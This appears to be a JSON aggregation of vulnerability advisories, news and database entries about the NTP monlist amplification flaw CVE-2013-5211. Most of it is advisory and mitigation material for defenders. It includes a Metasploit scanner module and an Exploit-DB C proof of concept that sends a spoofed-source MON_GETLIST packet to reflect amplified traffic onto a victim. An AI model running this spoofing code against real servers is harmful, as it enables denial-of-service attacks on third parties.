R2vqQNpFAPxKkMkbohLEPRmEK9dXGXejQ7EHFK5jzxInyg32WGFPkJ46bLw3bEsB sIoh+sxQ3J9mxyaykhX6T7U7PUkzBaNSs62bQE5H8695E30obnZqtfon6qBP5UCT /kF1+42RIQIPJUFS22NXaUJVOkpd2zyVhwLxgCHg96PHwd1VAC0bnuB4CQt8lN2C vcOsFcq6CUpMuteURBeiETb0OGWTTT3gyX4T7N4kRKptvmEVUKxZPnmfJCwNHM2I TzM2HbHaBv9CMIy5X4iDQxLH3w3tSh+IHU6m9cN5rd6JDTa5DQEuRkhaeVbCGHRt EcSHvUCr+llacITA2rkm1/KPcP97nGgbbM2QbbUVZ/vkdEcImPfrBzrBbaoBzf5p FTplhJ/4bfF0/Kgt5GTNgQXqtIuEQOs+ljNu2HW+cAfX2Hizlo7jjfMxS0y7/fY2 hBdg8zuXs/rBI2LKUcP6 =7q6W \\-----END PGP SIGNATURE----- \n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "freebsd_advisory", "title": "\nFreeBSD-SA-14:02.ntpd", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-14T00:00:00", "id": "FREEBSD_ADVISORY:FREEBSD-SA-14:02.NTPD", "href": "https://www.freebsd.org/security/advisories/FreeBSD-SA-14:02.ntpd.asc", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_security": [{"lastseen": "2023-04-17T15:50:20", "description": "\n", "cvss3": {}, "published": "2014-03-01T22:00:00", "type": "checkpoint_security", "title": "Blocking NTP access on Gaia OS / IPSO OS (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-03-01T22:00:00", "id": "CPS:SK98758", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk98758", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-09-21T11:13:00", "description": "The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows\nremote attackers to cause a denial of service (traffic amplification) via\nforged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited\nin the wild in December 2013.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=733940>\n * <http://bugs.ntp.org/show_bug.cgi?id=1532>\n * <https://bugs.launchpad.net/debian/+source/ntp/+bug/1268543>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | default ntp.conf in Ubuntu contains noquery, so monlist is disabled by default. Sites that need monlist should restrict it from known trusted IPs. Upstream has removed monlist in favour of mrulist. This is too intrusive to backport, so we're going to ignore this.\n", "cvss3": {}, "published": "2014-01-02T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5211", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-02T00:00:00", "id": "UB:CVE-2013-5211", "href": "https://ubuntu.com/security/CVE-2013-5211", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "thn": [{"lastseen": "2018-01-27T10:06:57", "description": "[](<https://3.bp.blogspot.com/-oVSLtOdo3bQ/UsZi5V-kLdI/AAAAAAAAZZk/C3qUk3gdGDk/s1600/Abusing+Network+Time+Protocol+%28NTP%29+to+perform+massive+Reflection+DDoS+attack.jpg>)\n\nIn 2013, we have seen a significant increase in the use of a specific distributed denial of service (DDoS) methodology known as [_Distributed Reflection Denial of Service attacks_](<https://thehackernews.com/search/label/DNS%20amplification>) (DrDoS). Open and misconfigured DNS (Domain Name System) can be used by anyone to resolve domain names to IP addresses are increasingly abused to launch powerful DDoS attacks.\n\nBut not only the DNS servers, Security Researchers at [Symantec](<http://www.symantec.com/connect/blogs/hackers-spend-christmas-break-launching-large-scale-ntp-reflection-attacks>) have spotted Network Time Protocol (NTP) reflection [DDoS attacks](<https://thehackernews.com/search/label/ddos%20attack?m=1>) being launched by cyber criminals during the Christmas Holidays.\n\n \n\n\n'_Network Time Protocol (NTP)_' is a distributed network clock time synchronization protocol that is used to synchronize computer clock times in a network of computers and runs over port 123 UDP.\n\n> NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks.\n\n[](<https://1.bp.blogspot.com/-zcXA9cZvgDE/UsZeruhpwQI/AAAAAAAAZZY/4QRHOHjF7mc/s1600/Abusing+Network+Time+Protocol+%28NTP%29+to+perform+massive+Reflection+DDoS+attack.png>)\n\nSame as DNS Reflection attack, the attacker sends a small spoofed 8-byte UDP packets are sent to the vulnerable NTP Server that requests a large amount of data (megabytes worth of traffic) be sent to the DDoS's target IP Address. CVE assigned to the NTP vulnerability is **[CVE-2013-5211](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211&cid=1>).**\n\n> In this case, the attackers are taking advantage of the monlist command. Monlist is a remote command in older version of NTP that sends the requester a list of the last 600 hosts who have connected to that server. For attackers the monlist query is a great reconnaissance tool.\n\nOn December 16, there were almost 15000 IP addresses involved in the NTP DDoS attack. These servers can be thought of as passive botnet members since the attacker can passively gather large lists of them. \n\n\n \n\n\nIf you manage a public NTP server, can fix the issue by updating it to NTP 4.2.7, for which the support of 'monlist' query has been removed in favor of new safe 'mrunlist' function which uses a nonce value ensuring that received IP address match the actual requester.\n", "cvss3": {}, "published": "2014-01-02T20:25:00", "type": "thn", "title": "Abusing Network Time Protocol (NTP) to perform massive Reflection DDoS attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-03T07:25:06", "id": "THN:465F1B217D51F604B360DA109B4F9B83", "href": "https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ics": [{"lastseen": "2023-09-23T09:55:30", "description": "## OVERVIEW\n\nNCCIC/ICS-CERT has been following the increase in denial-of-service (DoS) attacks using Network Time Protocol (NTP) Reflection. This type of attack provides an adversary the ability to generate high volume distributed denial of service (DDoS) traffic to target web sites or public\u2011facing devices that could cause disruption to services.\n\nThis vulnerability could be exploited remotely. Exploits that target this type of attack are known to be publicly available.\n\nMitigations are available for both operators of NTP Stratum devices and possible victims of these attacks.\n\n## AFFECTED PRODUCTS\n\nProducts using NTP service NTP-4.2.7p25 and prior (with MONLIST support) are affected. No specific vendor is specified as this is an open source protocol.\n\n## IMPACT\n\nExploitation of this vulnerability could cause NTP Stratum devices to be used as sources of unrequested NTP synchronization requests in a DoS attack.\n\nVictims of this type of DoS attack could see service interruption due to boundary protection rules do not filter NTP synchronization requests that do not originate internally.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nThe NTP is described in RFC 958Network Time Protocol (NTP), http://tools.ietf.org/html/rfc958, web site last accessed February 20, 2014., an open source collaboration for acceptance, and is used to synchronize system time over a network.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER INPUT VALIDATIONCWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed February 20, 2014.\n\nThe NTP service could allow for multiple sync requests to be made with a forged source IP address, thus sending the unrequested responses back to the source, consuming its resources. An attacker could exploit this vulnerability by sending a specifically crafted packet with a forged source IP address of the target.\n\nIt will not be evident to the NTP operator that the system has been exploited or is being used in a DoS attack as the commands are normal time synchronization requests.\n\nCVE-2013-5211NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211, NIST uses this advisory to create the CVE web site report. web site last accessed February 20, 2014. has been assigned to this vulnerability. A CVSS v2 base score of 7.8 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:N/I:N/A:C).CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:N/I:N/A:C, web site last accessed February 20, 2014.\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nNTP can be upgraded to NTP-4.2.7p26 or later that removes MONLIST support and is replaced with the more secure MRUNLIST function. This fix has been available since 2010.\n\nIn addition, integrators and asset owners are encouraged to review boundary protection rule sets and filters to eliminate incoming NTP requests that do not originate internally.\n\nNCCIC/US-CERT resource documents that outline suggestions for mitigating active DDoS attacks are available here:\n\nhttp://www.us-cert.gov/sites/default/files/publications/DDoS%20Quick%20Guide.pdf\n\nhttp://www.us-cert.gov/ncas/tips/ST04-015\n\n<http://www.kb.cert.org/vuls/id/348126>\n\nNCCIC/ICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN is only as secure as the connected devices.\n\nNCCIC/ICS-CERT also provides a section for control systems security recommended practices on the NCCIC/ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. NCCIC/ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the NCCIC/ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B\u2014Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the NCCIC/ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC/ICS-CERT for tracking and correlation against other incidents.\n", "cvss3": {}, "published": "2018-09-06T12:00:00", "type": "ics", "title": "NTP Reflection Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2018-09-06T12:00:00", "id": "ICSA-14-051-04", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-051-04", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-10-26T09:15:01", "description": "This module identifies NTP servers which permit \"monlist\" queries and obtains the recent clients list. The monlist feature allows remote attackers to cause a denial of service (traffic amplification) via spoofed requests. The more clients there are in the list, the greater the amplification.\n", "cvss3": {}, "published": "2010-01-27T06:53:24", "type": "metasploit", "title": "NTP Monitor List Scanner", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2022-02-16T23:22:40", "id": "MSF:AUXILIARY-SCANNER-NTP-NTP_MONLIST-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ntp/ntp_monlist/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::NTP\n include Msf::Auxiliary::DRDoS\n\n def initialize\n super(\n 'Name' => 'NTP Monitor List Scanner',\n 'Description' => %q{\n This module identifies NTP servers which permit \"monlist\" queries and\n obtains the recent clients list. The monlist feature allows remote\n attackers to cause a denial of service (traffic amplification)\n via spoofed requests. The more clients there are in the list, the\n greater the amplification.\n },\n 'References' =>\n [\n ['CVE', '2013-5211'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-013A'],\n ['URL', 'https://support.ntp.org/bin/view/Main/SecurityNotice'],\n ['URL', 'https://nmap.org/nsedoc/scripts/ntp-monlist.html'],\n ],\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptInt.new('RETRY', [false, \"Number of tries to query the NTP server\", 3]),\n OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false])\n ])\n\n register_advanced_options(\n [\n OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false])\n ])\n end\n\n # Called for each response packet\n def scanner_process(data, shost, sport)\n @results[shost] ||= { messages: [], peers: [] }\n @results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new.read(data).to_binary_s\n @results[shost][:peers] << extract_peer_tuples(data)\n end\n\n # Called before the scan block\n def scanner_prescan(batch)\n @results = {}\n @aliases = {}\n @probe = Rex::Proto::NTP.ntp_private(datastore['VERSION'], datastore['IMPLEMENTATION'], 42, \"\\0\" * 40).to_binary_s\n end\n\n # Called after the scan block\n def scanner_postscan(batch)\n @results.keys.each do |k|\n response_map = { @probe => @results[k][:messages] }\n peer = \"#{k}:#{rport}\"\n\n # TODO: check to see if any of the responses are actually NTP before reporting\n report_service(\n :host => k,\n :proto => 'udp',\n :port => rport,\n :name => 'ntp'\n )\n\n peers = @results[k][:peers].flatten(1)\n unless peers.empty?\n print_good(\"#{peer} NTP monlist request permitted (#{peers.length} entries)\")\n # store the peers found from the monlist\n report_note(\n :host => k,\n :proto => 'udp',\n :port => rport,\n :type => 'ntp.monlist',\n :data => {:monlist => peers}\n )\n # print out peers if desired\n if datastore['SHOW_LIST']\n peers.each do |ntp_peer|\n print_status(\"#{peer} #{ntp_peer}\")\n end\n end\n # store any aliases for our target\n report_note(\n :host => k,\n :proto => 'udp',\n :port => rport,\n :type => 'ntp.addresses',\n :data => {:addresses => peers.map { |p| p.last }.sort.uniq }\n )\n\n if (datastore['StoreNTPClients'])\n print_status(\"#{peer} Storing #{peers.length} NTP client hosts in the database...\")\n peers.each do |r|\n maddr,mport,mserv = r\n next if maddr == '127.0.0.1' # some NTP servers peer with themselves..., but we can't store loopback\n report_note(\n :host => maddr,\n :type => 'ntp.client.history',\n :data => {\n :address => maddr,\n :port => mport,\n :server => mserv\n }\n )\n end\n end\n end\n\n vulnerable, proof = prove_amplification(response_map)\n what = 'NTP Mode 7 monlist DRDoS (CVE-2013-5211)'\n if vulnerable\n print_good(\"#{peer} - Vulnerable to #{what}: #{proof}\")\n report_vuln({\n :host => k,\n :port => rport,\n :proto => 'udp',\n :name => what,\n :refs => self.references\n })\n else\n vprint_status(\"#{peer} - Not vulnerable to #{what}: #{proof}\")\n end\n end\n\n end\n\n # Examine the monlist reponse +data+ and extract all peer tuples (saddd, dport, daddr)\n def extract_peer_tuples(data)\n return [] if data.length < 76\n\n # NTP headers 8 bytes\n ntp_flags, ntp_auth, ntp_vers, ntp_code = data.slice!(0,4).unpack('C*')\n pcnt, plen = data.slice!(0,4).unpack('nn')\n return [] if plen != 72\n\n idx = 0\n peer_tuples = []\n 1.upto(pcnt) do\n # u_int32 firsttime; /* first time we received a packet */\n # u_int32 lasttime; /* last packet from this host */\n # u_int32 restr; /* restrict bits (was named lastdrop) */\n # u_int32 count; /* count of packets received */\n # u_int32 addr; /* host address V4 style */\n # u_int32 daddr; /* destination host address */\n # u_int32 flags; /* flags about destination */\n # u_short port; /* port number of last reception */\n\n _,_,_,_,saddr,daddr,_,dport = data[idx, 30].unpack(\"NNNNNNNn\")\n\n peer_tuples << [ Rex::Socket.addr_itoa(saddr), dport, Rex::Socket.addr_itoa(daddr) ]\n idx += plen\n end\n peer_tuples\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ntp/ntp_monlist.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2023-06-22T02:55:14", "description": "", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "exploitdb", "title": "NTP ntpd monlist Query Reflection - Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2013-5211", "CVE-2013-5211"], "modified": "2014-04-28T00:00:00", "id": "EDB-ID:33073", "href": "https://www.exploit-db.com/exploits/33073", "sourceData": "/*\n * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification\n * Date: 28/04/2014\n * Code Author: Danilo PC - <DaNotKnow@gmail.com>\n * CVE : CVE-2013-5211\n*/\n\n/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)\n * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,\n * if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.\n */\n\n//------------------------------------------------------------------------------------------------//\n//------------------------------------------------------------------------------------------------//\n\n\n#include <stdio.h> //For on printf function\n#include <string.h> //For memset\n#include <sys/socket.h> //Structs and Functions used for sockets operations.\n#include <stdlib.h>\t //For exit function\n#include <netinet/ip.h> //Structs for IP header\n\n//Struct for UDP Packet\nstruct udpheader{\n\tunsigned short int udp_sourcePortNumber;\n\tunsigned short int udp_destinationPortNumber;\n\tunsigned short int udp_length;\n\tunsigned short int udp_checksum;\n};\n\n// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler\nstruct \tntpreqheader {\n\tunsigned char rm_vn_mode;\t\t/* response, more, version, mode */\n\tunsigned char auth_seq;\t\t/* key, sequence number */\n\tunsigned char implementation;\t\t/* implementation number */\n\tunsigned char request;\t\t\t/* request number */\n\tunsigned short err_nitems;\t\t/* error code/number of data items */\n\tunsigned short mbz_itemsize;\t\t/* item size */\n\tchar data[40];\t\t\t\t/* data area [32 prev](176 byte max) */\n\tunsigned long tstamp;\t\t\t/* time stamp, for authentication */\n\tunsigned int keyid;\t\t\t/* encryption key */\n\tchar mac[8]; \t\t/* (optional) 8 byte auth code */\n};\n\n\n// Calculates the checksum of the ip header.\nunsigned short csum(unsigned short *ptr,int nbytes)\n{\n register long sum;\n unsigned short oddbyte;\n register short answer;\n\n sum=0;\n while(nbytes>1) {\n sum+=*ptr++;\n nbytes-=2;\n }\n if(nbytes==1) {\n oddbyte=0;\n *((u_char*)&oddbyte)=*(u_char*)ptr;\n sum+=oddbyte;\n }\n\n sum = (sum>>16)+(sum & 0xffff);\n sum = sum + (sum>>16);\n answer=(short)~sum;\n return(answer);\n}\n\n\n//Da MAIN\n\nint main(int argc, char **argv)\n{\nint status;\t\t\t// Maintains the return values of the functions\nstruct iphdr *ip;\t\t// Pointer to ip header struct\nstruct udpheader *udp;\t\t// Pointer to udp header struct\nstruct ntpreqheader *ntp;\t// Pointer to ntp request header struct\nint sockfd;\t\t\t// Maintains the socket file descriptor\nint one = 1;\t\t\t// Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.\nstruct sockaddr_in dest;\t// Maintains the data of the destination address\nchar packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself\n\n// Parameters check\n\tif( argc != 3){\n\t\tprintf(\"Usage: ./ntpDdos [Target IP] [NTP Server IP]\\n\");\n\t\tprintf(\"Example: ./ntpDdos 1.2.3.4 127.0.0.1 \\n\");\n\t\tprintf(\"Watch it on wireshark!\\n\");\n\t\tprintf(\"Coded for education purpose only!\\n\");\n\t\texit(1);\n\t}\n\n// Create a socket and tells the kernel that we want to use udp as layer 4 protocol\n\tsockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);\n\tif (sockfd == -1){\n\t\tprintf(\"Error on initializing the socket\\n\");\n\t\texit(1);\n\t}\n\n\n\n//Sets the option IP_HDRINCL\n\tstatus = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);\n\tif (status == -1){\n printf(\"Error on setting the option HDRINCL on socket\\n\");\n exit(1);\n }\n\n\n//\"Zeroes\" all the packet stack\n\tmemset( packet, 0, sizeof(packet) );\n\n\n//Mounts the packet headers\n// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!\n\tip = (struct iphdr *)packet;\n\tudp = (struct udpheader *) (packet + sizeof(struct iphdr) );\n\tntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );\n\n\n//Fill the IP Header\n\tip->version = 4;\t\t//IPv4\n ip->ihl = 5;\t\t\t//Size of the Ip header, minimum 5\n ip->tos = 0;\t\t\t//Type of service, the default value is 0\n ip->tot_len = sizeof(packet); //Size of the datagram\n ip->id = htons(1234); \t//LengthIdentification Number\n ip->frag_off = 0;\t\t//Flags, zero represents reserved\n ip->ttl = 255;\t \t\t//Time to Live. Maximum of 255\n ip->protocol = IPPROTO_UDP;\t//Sets the UDP as the next layer protocol\n ip->check = 0;\t \t\t//Checksum.\n ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)\n ip->daddr = inet_addr( argv[2] ); //Destination IP\n\n\t//Fills the UDP Header\n\tudp->udp_sourcePortNumber = htons( atoi( \"123\" ) ); //Source Port\n\tudp->udp_destinationPortNumber = htons(atoi(\"123\")) ; //Destination Port\n\tudp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet\n\tudp->udp_checksum = 0;\t\t\t\t //Checksum\n\n\t//Calculate the checksums\n\tip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header\n\n\t//Sets the destination data\n\tdest.sin_family = AF_INET;\t\t\t\t // Address Family Ipv4\n\tdest.sin_port = htons (atoi( \"123\" ) ) ; \t\t// Destination port\n\tdest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere\u00e7o para onde se quer enviar o pacote\n\n\t//Fills the NTP header\n\t//Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST\n\t//To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the\n\t// ntp request packet and hardcoded the values for the fields to make a \"MON_GETLIST\" request packet.\n\t// To learn more, read this: http://searchcode.com/codesearch/view/451164#127\n\tntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7\n\tntp->implementation=0x03; //Sets the implementation to 3\n\tntp->request=0x2a;\t //Sets the request field to 42 ( MON_GETLIST )\n\t\t\t\t //All the other fields of the struct are zeroed\n\n\n\t// Sends the packets\n\tstatus = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );\n\t\tif(status <0){\n\t\t\tprintf(\"Failed to send the packets\\n\");\n\t\t\texit(1);\n\t\t}\n\n\n}", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/dos/33073.c", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "vmware": [{"lastseen": "2021-06-08T18:38:41", "description": "**a. DDoS vulnerability in NTP third party libraries**\n\nThe NTP daemon has a DDoS vulnerability in the handling of the \"monlist\" command. An attacker may send a forged request to a vulnerable NTP server resulting in an amplified response to the intended target of the DDoS attack. \n \n**Mitigation** \n \nMitigation for this issue is documented in VMware Knowledge Base article [2070193](<http://kb.vmware.com/kb/2070193>). This article also documents when vSphere products are affected. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5211 to this issue. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "vmware", "title": "VMware vSphere updates to third party libraries", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2014-12-04T00:00:00", "id": "VMSA-2014-0002", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0002.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-09-12T15:51:17", "description": "a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of the \"monlist\" command. An attacker may send a forged request to a vulnerable NTP server resulting in an amplified response to the intended target of the DDoS attack.MitigationMitigation for this issue is documented in VMware Knowledge Base article 2070193. This article also documents when vSphere products are affected.The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5211 to this issue.Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "vmware", "title": "VMware vSphere updates to third party libraries", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4332", "CVE-2013-5211"], "modified": "2014-12-04T00:00:00", "id": "VMSA-2014-0002.4", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0002.4.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
Security Bulletin: NTP vulnerability in Network Intrusion Prevention System (CVE-2013-5211)
